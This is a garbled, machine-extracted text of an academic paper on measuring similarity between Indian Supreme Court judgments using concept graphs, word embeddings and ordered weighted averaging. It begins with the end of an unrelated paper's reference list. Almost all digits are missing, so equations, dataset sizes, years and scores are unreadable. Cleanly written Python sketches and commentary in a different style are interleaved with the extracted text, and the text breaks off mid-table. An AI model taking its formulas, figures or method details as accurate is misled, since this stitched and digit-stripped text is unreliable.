output. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . huang j, gates aj, sinatra r, barabasi a-l. . historical comparison of gender inequality in scientific careers across countries and disciplines. arxiv preprint. arxiv: . . jamieson kh, mcnutt m, kiermer v, sever r. . signaling the trustworthiness of science. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . jerger ne, kaeli d, kozyrakis c, loh g, wenisch t, wood d. . report from the committee to study the isca review process (r ). available at https://docs.google.com/presentation/d/ jzgb qbpihoyqs qm bh t roub rsgi _jkcku/.
karimi f, wagner c, lemmerich f, jadidi m, strohmaier m. . inferring gender from names on the web: a comparative evaluation of gender detection methods. in: proceedings of the th international conference companion on world wide web, www' companion, international world wide web conferences steering committee. republic and canton of geneva, switzerland, – doi . / . . langford j. . icml acceptance statistics. available at http://hunch.net/?p= . langford j. . representative reviewing. communications of the acm. available at https://cacm.acm.org/blogs/blog-cacm/ -representative-reviewing/fulltext. lawrence n, cortes c. . the nips experiment. available at http://inverseprobability.com/ / / /the-nips-experiment. lee cj, sugimoto cr, zhang g, cronin b. . bias in peer review. journal of the american society for information science and technology ( ): – doi . /asi. . mahoney mj. . publication prejudices: an experimental study of confirmatory bias in the peer review system. cognitive therapy and research ( ): – doi . /bf . mainguy g, motamedi mr, mietchen d. . peer review–the newcomers' perspective. plos biology ( ):e doi . /journal.pbio. . mattauch s, lohmann k, hannig f, lohmann d, teich j. . a bibliometric approach for detecting the gender gap in computer science. communications of the acm : – doi . / . mcnutt ra, evans at, fletcher rh, fletcher sw. . the effects of blinding on the quality of peer review: a randomized trial. jama ( ): – doi . /jama. . . murray d, siler k, lariviére v, chan wm, collings am, raymond j, sugimoto cr. . gender and international diversity improves equity in peer review. biorxiv . papagiannaki k. . author feedback experiment at pam . acm sigcomm computer communication review ( ): – . parno b, erlingsson u, enck w. . report on the ieee s&p submission and review process and its experiments. available at http://www.ieee-security.org/tc/reports/ /sp -pcchairreport.pdf. rozycki w, johnson nh. . non-canonical grammar in best paper award winners in engineering. english for specific purposes ( ): – doi . /j.esp. . . . sense about science. . quality, trust & peer review: researchers' perspectives years on. available at https://senseaboutscience.org/wp-content/uploads/ / /quality-trust-peer-review.pdf. shah nb, tabibian b, muandet k, guyon i, von luxburg u. . design and analysis of the nips review process. the journal of machine learning research ( ): – . solomon dj. . a survey of authors publishing in four megajournals. peerj :e doi . /peerj. .
tomkins a, zhang m, heavlin wd. . reviewer bias in single-versus double-blind peer review. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . vardi my. . conferences vs. journals in computing research. communications of the acm ( ): – . vines t. . is peer review a coin toss? the scholarly kitchen. available at https://scholarlykitchen.sspnet.org/ / / /is-peer-review-a-coin-toss/. wallach ds. . rebooting the cs publication process. communications of the acm ( ): – . wang ll, stanovsky g, weihs l, etzioni o. . gender trends in computer science authorship. arxiv preprint. arxiv: . .
submitted may accepted february published march corresponding author rupali s. wagh, rupali.wagh@christuniversity.in academic editor fabrizio sebastiani additional information and declarations can be found on page doi . /peerj-cs. copyright wagh and anand distributed under creative commons cc-by . open access legal document similarity: a multi-criteria decision-making perspective rupali s. wagh ,* and deepa anand ,* department of computer science, jain deemed to be university, bangalore, karnataka, india department of information science and engineering, cmr institute of technology, bangalore, karnataka, india * these authors contributed equally to this work. abstract the vast volume of documents available in legal databases demands effective information retrieval approaches which take into consideration the intricacies of the legal domain. relevant document retrieval is the backbone of the legal domain. the concept of relevance in the legal domain is very complex and multi-faceted. in this work, we propose a novel approach of concept based similarity estimation among court judgments. we use a graph-based method to identify prominent concepts present in a judgment and extract sentences representative of these concepts. the sentences and concepts so mined are used to express/visualize likeness among concepts between a pair of documents from different perspectives. we also propose to aggregate the different levels of matching so obtained into one measure quantifying the level of similarity between a judgment pair. we employ the ordered weighted average (owa) family of aggregation operators for obtaining the similarity value. the experimental results suggest that the proposed approach of concept based similarity is effective in the extraction of relevant legal documents and performs better than other competing techniques. additionally, the proposed two-level abstraction of similarity enables informative visualization for deeper insights into case relevance.
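the ordered weighted average named in the abstract above is yager's owa operator: the criterion scores are first sorted in decreasing order and only then combined with a fixed weight vector, so the weights attach to rank positions rather than to particular criteria. a minimal sketch with invented scores and weights (the paper's actual weighting scheme is not reproduced here):

```python
def owa(scores, weights):
    """Yager's OWA: sort the scores descending, then take the weighted sum with fixed weights."""
    assert len(scores) == len(weights) and abs(sum(weights) - 1.0) < 1e-9
    ordered = sorted(scores, reverse=True)
    return sum(w * s for w, s in zip(weights, ordered))

# Hypothetical per-criterion similarity values for one judgment pair (e.g., one per shared concept).
criteria_scores = [0.82, 0.40, 0.65]
print(owa(criteria_scores, [0.5, 0.3, 0.2]))  # optimistic weighting: emphasizes the best matches
print(owa(criteria_scores, [0.2, 0.3, 0.5]))  # pessimistic weighting: emphasizes the worst matches
```

shifting the weight mass toward the first positions yields an optimistic ("at least one concept matches well") aggregate, while shifting it toward the last positions demands that all concepts match.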
subjects artificial intelligence, computational linguistics, data science, digital libraries keywords legal information retrieval, concept based similarity, multi-dimensional similarity, owa, concept interaction graph introduction easy availability of legal information resources through online legal databases has provided much-required acceleration to the research in the domain of legal information retrieval (lir). lir aims at retrieving legal information objects relevant to a user’s query. legal information objects are various documents like court transcripts, verdicts, legislation documents, and judgments that are generated during the course of a legal process. these documents are primary resources for the interpretations of the law of any judiciary and hence are required by a legal professional for decision making as well as argumentation. specific characteristics of legal documents like document size, document internal structure, temporal properties, specific legal terminology, polysemy, and heterogeneity make lir different extremely complex as compared to other domains. since every legal document presents one or more legal issue, the legal domain demands how to cite this article wagh rs, anand d. . legal document similarity: a multi-criteria decision-making perspective. peerj com- put. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:rupali.wagh@christuniversity.in https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. context based document retrieval than just data based retrieval. contextualization of a legal issue is a non-trivial task due to the inherent complexities of this domain. additionally, the concept of ‘‘match’’ or ‘‘relevance’’ is multi-dimensional in the legal domain (van opijnen, ). lir is thus a very challenging research field as the domain necessitates for very generic to a very specific abstraction of a legal document at the same time. retrieving relevant legal document from a huge collection of resources requires a deep understanding of the notion of relevance in this domain and intelligent methods for identification and representation of legal concepts for establishing relevance. finding similarity among legal documents, specifically among court judgments is one of the most studied problems under lir. methods and techniques used in lir originate from confluence of four major technologies: namely artificial intelligence (ai), network analysis, machine learning and nlp (bench-capon et al., ). legal knowledge is very complex and is available in various documents written in natural languages. ontology, a branch of ai, is widely used to facilitate effective knowledge management in the legal domain (saravanan, ravindran & raman, ). knowledge engineering using semantic web and ontology for specific sub-domains of law is practiced popularly (casanovas et al., ) due to the ease of modeling legal actors, agents, and relationships using these technologies. with the advents in other technological domains, legal ontological solutions are also upgraded to incorporate more scalable, re-usable, context-aware and user- centered approaches in the existing framework. 
citations or bibliographical relevance in the legal domain is extremely important for understanding the interpretations and applications of law and a network is the most obvious representation of data for legal citation analysis. thus, citation network analysis explicably remains one of the very popular techniques in lir. earlier approaches predominantly use network degree statistics and structural properties for extraction of relevant documents in the legal domain (van opijnen, ; koniaris, anagnostopoulos & vassiliou, ). approaches which use centrality and between-ness of a node in a case citation network (wagh & anand, ) to find similarity among indian court judgments are proposed. but, with the recent advancements in deep learning based graph embedding models (cui et al., ), graph and all its components can be represented as dense feature vectors enabling exploration of newer models in network analysis for lir. (sugathadasa et al., ) use node embeddings obtained using node vec algorithm (goyal & ferrara, ; grover & leskovec, ) for case citation data for finding similar legal documents. analysis of case citation data using machine learning methods to estimate similarity among cases has also been experimented in the past. coupling of bibliographic information with text in the paragraph of judgments (kumar et al., ) for estimation of similarity between two judgments is proposed. exploring relatedness among cases by finding common citations is proposed (nair & wagh, ) where authors present application of association rule mining to estimate similarity value. while citation based similarity among court cases is undoubtedly of very high significance in legal domain, the case citations graphs are generally very sparse (mandal et al., a; mandal et al., b). moreover, semantic relationships among the case judgments and their interpretation are implicitly available as text within a judgment document. natural language processing (nlp), along with wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. machine learning methods are used to establish semantic relevance of textual contents present in the documents (branting, ). until recently, vector space model and latent semantic indexing, lsi with its variants were used largely for semantic representation of text. with the emergence of word/document embeddings, information retrieval is now shifted to neural information retrieval (onal et al., ). dense vector representations of word and document obtained using deep learning based models are used as input for machine learning algorithms. the strength of these models lies in capturing the semantics of text and thereby recognizing document similarities without exact word-match. many studies highlight the effectiveness of neural embedding for text mandal et al. ( a), mandal et al. ( b) and vo, privault & guillot ( ) for legal information retrieval. finding relevant precedents (judgments) is one of the most widely studied problems in lir. a court judgment is a complex document with various sections describing the application of law to the legal issues discussed during the case proceedings. there is a general agreement on the need for concept-based document retrieval in legal domain, and the approaches for lir largely focus on obtaining a single representation of document covering all legal concepts present in the document which results in single similarity value. 
one of the major limitations of these approaches is the inability to provide interpretations of relevance for in-depth understanding. while a single numeric value for measuring relevance is undoubtedly of very high significance in information retrieval, user satis- faction in an ir system also depends on intuitively informative results provided by the system. there are studies (koniaris, anagnostopoulos & vassiliou, ) emphasizing on the need for going beyond a single homogeneous similarity value for more effective legal information retrieval. in this proposed work, we present the legal document similarity estimation as a multi-criteria decision-making (mcdm) problem. we specifically focus on the problem of finding the similarity among court judgments for the indian supreme court judgment corpus. we extract prominent concepts which are considered as criteria and extract representative sentences for each of the criteria. using these sentences, we then generate a concept similarity matrix for the concepts extracted from the documents. every value in the similarity matrix represents weight for the criterion and final similarity value is calculated using the ordered weighted average (owa) operator. thus, the approach provides two abstractions of relevance between a judgment pair: ( ) at the concept level as a matrix of similarity values; ( ) at the document level as single similarity value obtained by aggregating concept level similarity. experimental results demonstrate the effectiveness of our proposed approach for the extraction of relevant judgments. in addition to the enhanced performance of relevant judgment retrieval, this approach enables informative visualization of results that provide deeper insights into the relevance obtained. the remainder of the paper is organized as follows; the next section, ‘materials and methods’, elaborates the steps of the proposed approach in detail. the section ‘experimental evaluation’ discusses the experimental set-up and provides the details on the data set and implementation framework used in the proposed work. we present results and discussion on obtained results in the ‘results and discussion’ section where we compare the results with existing work in lir for indian legal system. we further wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. highlight the effectiveness of our work. we conclude with a note on the future direction for the proposed work in the ‘conclusion’ section. materials & methods semantic matching of documents is the most fundamental activity of lir. generically, textual units of different granularity viz. words, phrases, sentences, paragraphs and even complete documents are used for establishing semantic relevance between user’s query and documents. embeddings are obtained by considering word neighborhood as the context, and hence capture the semantics of text even without exact word match. these methods are very effective and popular for all nlp tasks across the domains (onal et al., ). one of the limitations of deep learning based vector embedding as highlighted in (moody, ) is the inability to provide interpretative insights. judgment documents are complex and lengthy. the estimation of similarities among long documents requires a different approach as the similarity has to be modeled as a function of the concepts present in the documents (liu et al., ). 
moreover, since the concepts may be scattered throughout the body of the text in a document, a well-defined approach for identification of concepts is required. in this paper, we propose a three-step approach for finding con- cept based similarity among court judgments: (i) identification of main concepts/topics of the document (ii) extraction of the text under every concept (iii) similarity calculation using suitable measure. these steps are explained in detail in the following sub-sections. identification of basic concept words natural language processing (nlp) offers a wide range of methods and approaches for the identification of topics from a document. traditional tf-idf based vector space model and latent dirichlet allocation (lda) use the distribution of words (moody, ) in the document to extract topics. these methods do not consider word neighborhood and are based on exact word match. graph-based extraction of topics is another popular approach (ying et al., and sayyadi & raschid, ) for identifying the broad themes in documents. these methods are based on establishing a relationship between words/concepts using estimates such as co-occurrence, semantic similarity, etc. for extraction of prominent topics in a document. variants of the above two approaches are popularly used for topic identification and available as off-the-shelf tools for identifying prominent words in the document. we propose employing a variation of the graph-based method for identifying topics and utilizing it to obtain important segments of the judgment. let l={l ,l ...,ln}be the set of ‘n’ legal judgments in the corpus. let n(li) be the set of sentences in the legal document li and let lij be the ‘j’th sentence of the ‘i’th legal judgment document. as the first step in the pre-processing of documents, we construct the base concept words as the nouns present in sentences in the judgment. liu et al. ( ) propose extraction of keywords as basic concepts where authors demonstrate similarity estimation for news reports using concept interaction graph. specific and distinctive characteristics of legal documents require a domain-specific approach for the extraction of concepts from the documents. while a person’s name may have a lot of relevance in a news report, it just wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. represents a party (respondent or appellant) or a participant in the case and does not actually contribute to any legal concept present in the judgment. therefore, we ignore references to specific people, place etc. which appear as proper nouns from the input in the document, and we define base word concept set of the ‘j’th sentence in the ‘i’th document, b ( lij ) , as: b ( lij ) = { x ∈lij ∣∣pos(x)= ′commonnoun′and x ∈=(lij) ( ) here pos(x)stands for part of speech of the word x and=(lij) represents the important words in the sentence lij. we consider a common noun appearing in the sentences as concepts and construct a concept interaction graph using concept co-occurrences. however, we are selective about the nouns appearing in the concept graph and only allow important nouns to represent the document fragments. tf-idf, term frequency- inverse document frequency method is the most fundamental weighing scheme used in an information retrieval system. 
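Before the TF-IDF importance filter is described in detail, the part-of-speech side of Eq. (1) can be made concrete. The sketch below extracts the candidate base concept words of a sentence, i.e., its common nouns, while proper nouns (party names, places, etc.) are discarded. The paper does not name the tagger it uses, so NLTK's default English tagger is assumed here purely for illustration; the importance filter of Eq. (2) still has to be intersected with this set, as shown in the following sketch.

```python
# Hypothetical sketch of the POS-based part of Eq. (1): keep common nouns,
# drop proper nouns. Requires NLTK's 'punkt' and 'averaged_perceptron_tagger'
# resources; any comparable tagger could be substituted.
import nltk

def candidate_nouns(sentence):
    """Return the common nouns of one sentence (candidates for Eq. (1))."""
    tagged = nltk.pos_tag(nltk.word_tokenize(sentence))
    # Penn Treebank tags: NN/NNS = common noun; NNP/NNPS (proper nouns) are ignored.
    return [word for word, tag in tagged if tag in ("NN", "NNS")]
```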
tf-idf computes weight for a term in a document collection by assessing its local relevance using term frequency within the document (tf) and global relevance by computing inverse document frequency for the entire document collection (ramos, ). to assess this importance of the nouns we use tf-idf model constructed for individual judgment by considering every sentence in a judgment as a separate document. the judgment, therefore, can be deemed to be a collection of documents (lij,j� ...n(li)). therefore= ( lij ) can be determined as: = ( lij ) = { x ∈lij ∣∣tf (x,lij)×idf (x,li)> mean k�[ ,n(li)] (tf (x,lik)×idf (x,li)) ( ) where tf (x,lij) is the term frequency of the word ‘x’ in the sentence lij, idf (x,li) measures the uniqueness of ‘x’ across the document li and the words having tf-idf above the mean tf-idf score over the document are considered important. identification of main concepts/topics of the document detection of related words in the judgment document is an important step and this is assessed based on the proximity of the base concept words. a concept graph gi = (vi,ei) of a legal document li, is constructed using the base concept words s.t. vi =⋃ j∈[ ,n(li)]b ( lij ) and ei = {( x,y ) |co−occurrence ( s,y ) > } . the set of vertices vi is the set of all base concept words across all sentences in the document and two concept words nodes in the graph have an edge between them if their co-occurrence count is above i.e., they appear together in at least three of the sentences. we use the count of co-occurrences as the strength of association between two concepts words. less than co-occurrences of concept words may represent mere coincidence and hence we do not deem such associations as strong enough for addition of edge in the graph. figure shows a concept graph constructed from a document fragment. to discover important topics in the document we employ louvain modularity com- munity detection algorithm (de meo, ). the algorithm tries to locate communities by trying to maximize the modularity i.e., the ratio of the density of edges inside each community to the density of edges to nodes outside the community. the algorithm runs iteratively by first identifying small communities with high modularity and then proceeds wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure sample concept graph for a judgment document fragment. full-size doi: . /peerjcs. /fig- to enlarge the communities by grouping them to achieve the maximum increase in mod- ularity. we use the best partition method in the python networkx module, for detecting concepts in the document (community detection for networkx’s documentation, ). figure shows an example of communities so evolved for a pair of judgments. let mi be the number of communities learnt for the document li and let the communities so detected be ci ,ci ,...,cimi. each community thus identified is considered as a prominent concept which is represented by a set of words that formed the nodes in the initial concept graph. representative sentence selection and similarity estimation once the main concepts, represented as word communities, in the document are identified, for each concept the top five, most representative sentences for that concept are selected. tf-idf scoring is used for this purpose. each concept cij, is a collection of words and can be considered as a document, similar to how each sentence in li is considered a document (eq. ( )). 
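The concept-graph construction just described can be summarized in a short sketch. Assuming per-sentence common nouns from the previous sketch, the code below applies the importance filter of Eq. (2) (a word is kept in a sentence if its TF-IDF there exceeds its mean TF-IDF across the judgment), counts noun co-occurrences, adds an edge only when two nouns share at least three sentences, and reads Louvain communities off the resulting graph as the document's prominent concepts. scikit-learn's smoothed TF-IDF, networkx, and the python-louvain package are used here for illustration; the paper itself relies on gensim's TF-IDF implementation.

```python
# Illustrative sketch, not the authors' code: Eq. (2) importance filtering,
# co-occurrence concept graph, and Louvain community detection.
import itertools
import networkx as nx
import community as community_louvain                # python-louvain package
from sklearn.feature_extraction.text import TfidfVectorizer

def concept_communities(sentences, sentence_nouns, min_cooccurrence=3):
    """sentences: raw sentences of one judgment (each treated as a document);
    sentence_nouns: common nouns per sentence, e.g. from candidate_nouns()."""
    vec = TfidfVectorizer()
    tfidf = vec.fit_transform(sentences).toarray()   # one row per sentence
    vocab = {w: j for j, w in enumerate(vec.get_feature_names_out())}
    word_mean = tfidf.mean(axis=0)                   # per-word mean over all sentences

    base = []                                        # Eqs. (1)-(2): important nouns
    for i, nouns in enumerate(sentence_nouns):
        keep = set()
        for w in (n.lower() for n in nouns):
            j = vocab.get(w)
            if j is not None and tfidf[i, j] > word_mean[j]:
                keep.add(w)
        base.append(keep)

    counts = {}                                      # sentence-level co-occurrences
    for nouns in base:
        for u, v in itertools.combinations(sorted(nouns), 2):
            counts[(u, v)] = counts.get((u, v), 0) + 1

    graph = nx.Graph()
    graph.add_edges_from((u, v, {"weight": c})
                         for (u, v), c in counts.items()
                         if c >= min_cooccurrence)   # at least three shared sentences
    if graph.number_of_nodes() == 0:
        return {}
    partition = community_louvain.best_partition(graph)
    concepts = {}
    for word, community_id in partition.items():
        concepts.setdefault(community_id, set()).add(word)
    return concepts                                  # concept id -> set of words
```

Each returned word set plays the role of one concept c_ij; the sentences closest to it (by cosine similarity of TF-IDF vectors, as described next) become its representatives.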
cosine similarity is computed between vectors representing each sentence in the judgment with the vector representing the concept. the five most similar sentences to the concept cij are chosen as sentences representing that concept in the judgment li. our aim is to construct a vector representation of each concept occurring in a legal judgment which can capture the degree of occurrence of various ideas. these vector representations of concepts can ease the computation of similarity between two judgment documents. let skij be the kth representative sentence for the ‘j’th concept in ‘i’th legal document. the vector representation of each concept can be derived in various ways, the simplest one, being averaging the tf-idf scores of skij,k ∈[ , ] i.e., averaging the tf- idf scores for all sentences representative of a concept. however, we leverage on recent advances in neural networks, to take advantage of the potential knowledge captured by word embeddings. word embeddings convert each word into a multi-dimensional vector of features in such a way that the vector representation of related words has high wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure communities derived from a judgment document. full-size doi: . /peerjcs. /fig- similarity. word embeddings are often trained on huge real-world datasets and thus are able to capture the semantics very effectively. in addition, word embeddings obtained through popular methods like word vec (mikolov et al., ) have the property of additive compositionality i.e., the ability of the sum of word vectors of words composing a sentence/paragraph to preserve the semantics contained therein. studies indicate that a word representation obtained using a combination of neural embeddings and tf-idf provides is more effective (lau & baldwin, ) than the just the vector representations in many nlp tasks. hence, we use idf value for every word as weight applied to the vector of the word obtained using word vec. we compute the vector wij corresponding to each concept cij using two methods namely word vec and idf weighted word vec and resultant vectors for these methods are computed using eqs. ( ) and ( ) respectively. wij = ∑ k= ∑ x∈skij word vec(x) ( ) and wij = ∑ k= ∑ x∈skij word vec(x)∗idf(x) ( ) here the summation involves vector addition of the word vectors of words belonging to each of the five representative sentences for the concept cij. the above-computed vector representation for each concept present in the judgment is finally used to compute the similarity between judgment documents. the notion of wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. similarity among documents, sometimes, may not be sufficiently captured by single similarity value. two documents may be similar to each other to different degrees when observed using different viewpoints. as an example, two legal documents may be similar because of commonalities in the case history but may be different in the way the cases were argued. on the other hand, two other legal documents may have nothing common in terms of the facts of the case but both may be overturning the judgment made by a lower court. to that extent, the two cases can be considered similar. when similarity computation is employed for judging the closeness of two documents, the context of the search may be unknown. 
in such cases estimating similarities using different notions and visualizing the same may be more helpful to the user than obtaining a single similarity score. the ability to derive multiple vector representations for various concepts contained in a legal document in this proposed approach could aid in finding different levels of similarity between a pair of legal documents. let la and lb be two legal judgments consisting of na and nb concepts respectively. we compute the similarity between each pair of concepts in la and lb. let sim(cai,cbj) be the similarity between the ‘i’th and the ‘j’th concepts of the documents la and lb, respectively. in this way, we obtain na×nb similarity values. we use these similarity values to establish links between concepts across the two documents. for the proposed approach, we only allow each concept to participate in a maximum of one link. modifications to this restriction are always possible and could possibly result in different similarity links and visualization result. the concepts in the two documents having the highest similarity value are linked using a similarity link. the documents which have already been linked are removed from further linking. this process is repeated taking the next two concepts one from each of the documents which are most similar and so on. the linking of highest matching concepts between a pair of judgments would be referred to as concept matches and an example of such a concept match is illustrated in fig. . it is to be noted that in figs. and only the concept words are shown (rather than the representative sentences) for ease of understanding. the strength of the lines connecting various concepts across the judgments are indicators of the level of match between the concepts. we present the following two examples to support the above explanation and to demonstrate how the proposed method is able to facilitate multi-level concept matching and visualization. example : a judgment pair discusses accident as a common theme but the facts in individual case result in multiple communities. whereas there is a high similarity match in the discussion about the accident incident itself (concept in both judgments - shown as a bold link between the two), there is little match in concept of the pair, the first talks about charges of homicide whereas the second talks about negotiating the amount of compensation for the dependents of the deceased. example : a judgment pair with discussion on intellectual property rights (ipr) and copyright. the two cases present different dimensions of ipr. case discusses ipr with respect to copyright of literary work whereas case discusses copyright on customer database as a business secret. concept and concept for the pair have a high likeness since these statements talk about property rights and infringement in general; the wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure concept based similarity—examples showing a substantial match through one concept but negligible match in another. (a) concepts derived from accident related cases. (b) concepts derived from copyright related cases. full-size doi: . /peerjcs. /fig- other two concepts in the judgments discuss copyright w.r.t. books while in the second judgment the unmatched concept discusses copyright on a database, trade, etc. example visualization for the above two situations is shown in fig. a and fig. b respectively. 
it is to be noted that the colors of the concept nodes are representative of the degree of closeness of the concepts. the different levels of similarity so obtained can also be aggregated to compute a single similarity value which could be useful for finding all relevant documents to a given judgment. given the various similarity values viewed from different perspectives between two judgments, we employ the ordered weight averaging operator for aggregating the various similarity values into one. owa is a family of aggregation operators introduced by yager ( ) has a special application for multi-attribute decision-making problem especially in the presence of fuzzy data and allows for the incorporation of linguistic cri- teria for aggregation. specifically, if there are items in a domain that need to be evaluated according to ‘p’ criteria ( t ,t ,...,tp ) s.t. tj(item) is the extent to which ‘item’ satisfies wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. the ‘j’th criterion, then it is possible to use the family of owa aggregation operators to evaluate the degree to which ‘item’ satisfies ‘‘some criteria’’, ‘‘all criteria’’, ‘‘most criteria’’ etc. in the case of similarity estimation in the present case, we can consider the pair of judgments to be the item and the various possible criteria could be: degree of match in facts of the case, degree of match in case citations, degree of match in the defense counsel’s argument, etc. in this case, the pair of judgments would be evaluated according to each of the criteria and according to our choice of linguistic aggregation needed i.e., most, some, etc, the overall similarity can be computed. it is to be noted here that the set of criteria for legal judgments is not fixed and is determined for each document pair based on the concepts derived in each document. the owa operator (yager, ) is defined as definition: owa operator a function f : rn → r is called on ordered weighted averaging (owa) operator of dimension ‘n’ if it has an associated weighting vector w of dimension ‘n’ such that: ( ) n∑ i= wi= ( )wi∈[ , ]∀i= , ···,n where, f is defined as f(x ,x ,...,xn)= ∑n i= wiyi, where yi is the ‘i’th largest value in the set of elements {x ,x ,...,xn}. owa can be used to emulate different aggregation operators such as max, min, average, etc, by adjusting the weights wi,∀i= , ···,n, suitably. these linguist operators fall in between the extremes of ‘‘at least one’’ to ‘‘all’’. in the current work, we propose to use the ‘‘most’’ aggregation operator. in this paper, we just outline the method of arriving at the weights for the owa operator and do not discuss the reasoning behind it. an in-depth presentation of the owa operators is presented in (carlsson & fullér, ). if there are ‘p’ criteria for evaluating the similarity between a pair of documents (i.e., p concepts matches between a pair of documents), then we define an operator qmost, corresponding to the linguistic quantifier ‘‘most’’ as qmost(x)=x . then the weights for the owamost operator can be determined by the formula (carlsson & fullér, ) as: w(i)= q ( i p ) −q ( i− p ) ( ) figure depicts similarity estimation using owa as described above for a sample pair of judgments. as shown in the figure, for the first judgment (doc ), three concepts are identified which are represented using three corresponding set of words. for the second judgment (doc ), two concepts are identified. 
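Pulling the last three steps together, the sketch below embeds each concept as the (optionally IDF-weighted) sum of word2vec vectors over its five representative sentences (Eqs. (3)-(4)), links the concepts of two judgments greedily one-to-one by cosine similarity, and aggregates the linked similarities with the OWA "most" operator (Eq. (5)). It assumes that the representative sentences have already been selected as described above, that `w2v` behaves like a gensim KeyedVectors object and `idf` is a word-to-IDF dictionary, and, because the exponent of the "most" quantifier is not legible in the text, that Q(x) = x^2, a common choice for "most".

```python
# Illustrative sketch of Eqs. (3)-(5); the names and the Q(x) = x**2
# quantifier are assumptions, not taken from the paper.
import numpy as np

def concept_vector(rep_sentences, w2v, idf=None):
    """Eq. (3)/(4): (IDF-weighted) sum of word vectors over the five
    representative sentences of one concept."""
    vec = np.zeros(w2v.vector_size)
    for sentence in rep_sentences:
        for word in sentence.split():
            if word in w2v:
                weight = idf.get(word, 1.0) if idf is not None else 1.0
                vec += weight * w2v[word]
    return vec

def cosine(u, v):
    denom = np.linalg.norm(u) * np.linalg.norm(v)
    return float(u @ v) / denom if denom else 0.0

def greedy_concept_links(concepts_a, concepts_b):
    """Link each concept to at most one concept of the other judgment,
    repeatedly taking the most similar still-unlinked pair."""
    pairs = sorted(((cosine(a, b), i, j)
                    for i, a in enumerate(concepts_a)
                    for j, b in enumerate(concepts_b)), reverse=True)
    used_a, used_b, link_sims = set(), set(), []
    for sim, i, j in pairs:
        if i not in used_a and j not in used_b:
            link_sims.append(sim)
            used_a.add(i)
            used_b.add(j)
    return link_sims

def owa_most(similarities):
    """Eq. (5): OWA aggregation under the linguistic quantifier 'most'."""
    p = len(similarities)
    if p == 0:
        return 0.0
    q = lambda x: x ** 2                    # assumed RIM quantifier for 'most'
    weights = [q(i / p) - q((i - 1) / p) for i in range(1, p + 1)]
    ordered = sorted(similarities, reverse=True)   # y_i = i-th largest value
    return float(sum(w * y for w, y in zip(weights, ordered)))
```

The document-level similarity for a judgment pair is then owa_most(greedy_concept_links(vectors_a, vectors_b)), where vectors_a and vectors_b hold the concept vectors of the two judgments; the individual link similarities are what the concept-level visualizations above display.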
the computation of similarity depicted in the figure is performed on the sentences representative of these concepts as explained above. wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure similarity computation using communities derived for a pair of judgments. note that the concept node colors reflect the similarity between concepts. full-size doi: . /peerjcs. /fig- the similarity so computed for various documents can then be used to rank judgments in order of relevance to a query judgment. table depicts the sample results obtained for a pair of judgments ranked as similar (ranked as on a scale of – ) by human expert. weight in the table represents the similarity of the sentence with the identified concept. using the proposed approach of similarity estimation using owa, a similarity score of . is obtained for this pair of judgments. the following few sections present the efficacy of the proposed method using various experiments. experimental evaluation we use indian supreme court case judgments from years ranging from to for this study. these documents are used during the training phase to learn vector representations for words. case judgments used for the experiments in this work were crawled from website http://www.judis.nic.in. experimental setup some of the judgments documents are extremely small and may not reveal any pattern. we considered , judgments with a length of more than sentences for this work. these documents are cleaned by removing the metadata information about the date, judge’s names, bench details, etc. while this information may be required for searching a particular case, it doesn’t contribute to the similarity among case judgment. judgments contain a lot of non-text information like section and rule numbers, specific number and wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://www.judis.nic.in http://dx.doi.org/ . /peerj-cs. table extraction of concepts and representative sentences—sample results. case concept most representative sentences for the concept weight case ‘author’, ‘time’, ‘detent’, ‘order’, ‘ground’ ‘when the act contemplates the furnishing of grounds of detention ordinarily within five days of the order of detention the intention is clear that the statements and documents which are referred to in the grounds of detention and which are required by the detenu and are expected to be in possession of the detaining authority should be furnished with reasonable expedition. . ‘‘that was obviously necessary because the information leading to the order of detention was laid by the customs authorities.the grounds of detention were also served on her on the same day.it was received by the home department of the delhi administration on january , but was actually placed before the administrator on january , when the detaining authority confirmed the order of detention. . the authorities who laid the information before the detaining authority and who were primarily concerned in the matter were the customs authorities via the director of rev- enue intelligence. . 
‘detenu’, ‘repre- sent’, ‘hear’, ‘delay’, ‘right’ ‘there was inexcusable delay in enabling the detenu to make a representation and indis- posing of the representation.in sukul\’s case (supra) the court also made certain perti- nent observations (at pages – ):\n’’no definite time can be laid down within which a representation of a detenu should be dealt with save and except that it is a constitutional right of a detenu to have his representation considered as expeditiously as possible.(supra) the detenu made his representation on th and th of march , the advisory board gave a hearing on th march and the detaining authority rejected the representation on th march. . the rejection of the representation was communicated to the detenu on january , . . we have ourselves examined the records and we find that though the administrator con- sidered the representation of the detenu after the hearing by the board, the administrator was entirely uninfluenced by the hearing before the board. . case ‘order’, ‘detent’, ‘opin- ion’, ’ground ‘under section of the act grounds of order of detention are to be disclosed to the per- sons affected by the order not later than days from the date of detention and the act fur- ther requires to afford the person affected by the order the earliest opportunity of mak- ing a representation against the order to the appropriate government.on january, the governor was pleased to confirm the order of detention after the advisory board had given opinion that there was sufficient cause for detention of the petitioner. . by an order dated august, the governor was pleased to confirm the order of de- tention of the petitioner.( ) the opinion of this court in the case of sk. section i 